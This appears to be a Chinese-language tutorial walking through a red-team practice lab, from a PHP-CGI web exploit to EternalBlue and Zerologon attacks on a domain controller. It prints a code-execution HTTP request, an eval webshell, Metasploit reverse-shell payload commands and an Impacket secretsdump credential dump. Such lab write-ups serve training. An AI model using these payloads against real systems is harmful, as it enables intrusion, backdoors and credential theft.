VPC1红队内网渗透靶场-PHPRCE-永恒之蓝-防火墙上线-密码喷射-DC域控提权-weblogic
字数 1519 2025-08-29 22:41:39
VPC1红队内网渗透靶场实战教学文档
环境搭建
下载与配置
- 靶场下载:百度网盘链接(提取码: ga54)
- 网络配置:
- vmware8/NAT:192.168.139.0网段
- vmware2:192.168.2.0网段
- vmware3:192.168.3.0网段
- vmware10:192.168.10.0网段
靶机组成
- Windows Server 2012 (运行XAMPP服务)
- Windows 7
- Windows 10
- Windows Server 2012 R2 (Weblogic单机)
- Windows Server 2012-WEB
- Windows Server 2016-AD-2016 (域控制器)
渗透流程详解
第一阶段:Windows Server 2012渗透
信息收集
- 目标开放80端口,运行XAMPP服务
PHP-CGI漏洞利用
- 漏洞验证:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpVulnEnv
REDIRECT-STATUS: XCANWIN
<?php die("Te"."sT");?>
- 写入Webshell:
<?php file_put_contents("../htdocs/1.php", " <?php @eval($_POST['attack']);?> "); ?>
- 成功写入后门文件到/htdocs/目录
- 使用中国菜刀/蚁剑连接webshell
- CS上线:
- 生成后门并上传执行
- 成功获取meterpreter会话
第二阶段:Windows 7渗透
信息收集
- 端口扫描发现仅开放445端口
- 使用fscan扫描发现存在MS17-010(永恒之蓝)漏洞
永恒之蓝漏洞利用
- MSF配置:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.129 LPORT=5210 -f exe -o 5210.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.129
set lport 1234
run
- 路由设置:
run autoroute -p # 查看当前路由表
run post/multi/manage/autoroute # 添加当前路由表
- 漏洞利用:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.2.129
set rhosts 192.168.2.129
set lhost 192.138.2.134
set lport 4548
- 后门上传与上线:
- 上传后门文件
- 设置端口转发实现上线
第三阶段:Windows 10渗透
密码喷射攻击
- 获取Administrator密码
- 进行横向移动
第四阶段:Windows Server R2(Weblogic)渗透
信息收集
- 发现7001端口(Weblogic服务)
攻击步骤
- 建立代理访问Weblogic
- 使用集成攻击工具
- 植入内存马
- 成功上线CS
第五阶段:Windows Server 2012 WEB渗透
密码抓取
- 获取系统密码
- 尝试横向移动
防火墙绕过
- 由于防火墙限制,无法使用反向上线
- 采用正向上线方式:
- 使用IPC协议共享文件
- 使用atexec执行命令
- 成功上线
第六阶段:域控制器(DC)渗透
信息收集
net time /domain # 确认域环境
CVE-2020-1472漏洞利用
- 使用Impacket工具:
python secretsdump.py "xiaodi.org/dc$@192.168.10.10" -no-pass
- 获取域控管理员凭证
- 获取Shell:
- 使用获取的凭证获取域控Shell
- 上线CS
关键技术与技巧总结
-
PHP-CGI漏洞利用:
- 注意allow_url_include和auto_prepend_file参数
- 文件写入路径需要准确(通常为/htdocs/)
-
永恒之蓝利用要点:
- 内网环境需要先建立路由
- 注意payload与目标系统架构匹配
- 可能需要端口转发才能上线
-
内网横向移动:
- 密码喷射攻击
- IPC共享+atexec执行
- 正反向连接选择
-
域渗透技巧:
- 使用net time /domain确认域环境
- CVE-2020-1472漏洞利用
- Impacket工具链使用
-
防火墙绕过:
- 正向上线技术
- 文件共享与远程执行组合
常见问题解决
-
永恒之蓝利用失败:
- 检查目标系统补丁状态
- 确认payload架构匹配
- 验证网络路由设置
-
正向上线受阻:
- 检查防火墙规则
- 尝试不同协议(IPC, SMB等)
- 验证凭证有效性
-
Weblogic攻击问题:
- 确认Weblogic版本
- 尝试不同内存马
- 检查代理设置是否正确
总结
本靶场涵盖了从外网渗透到内网横向移动,再到域控提权的完整攻击链。关键技术点包括:
- Web应用漏洞利用(PHP-CGI)
- 系统漏洞利用(永恒之蓝)
- 内网信息收集与横向移动
- 域环境渗透与提权
- 防火墙绕过技术
通过此靶场练习,可以全面掌握红队渗透测试的核心技能和实战思路。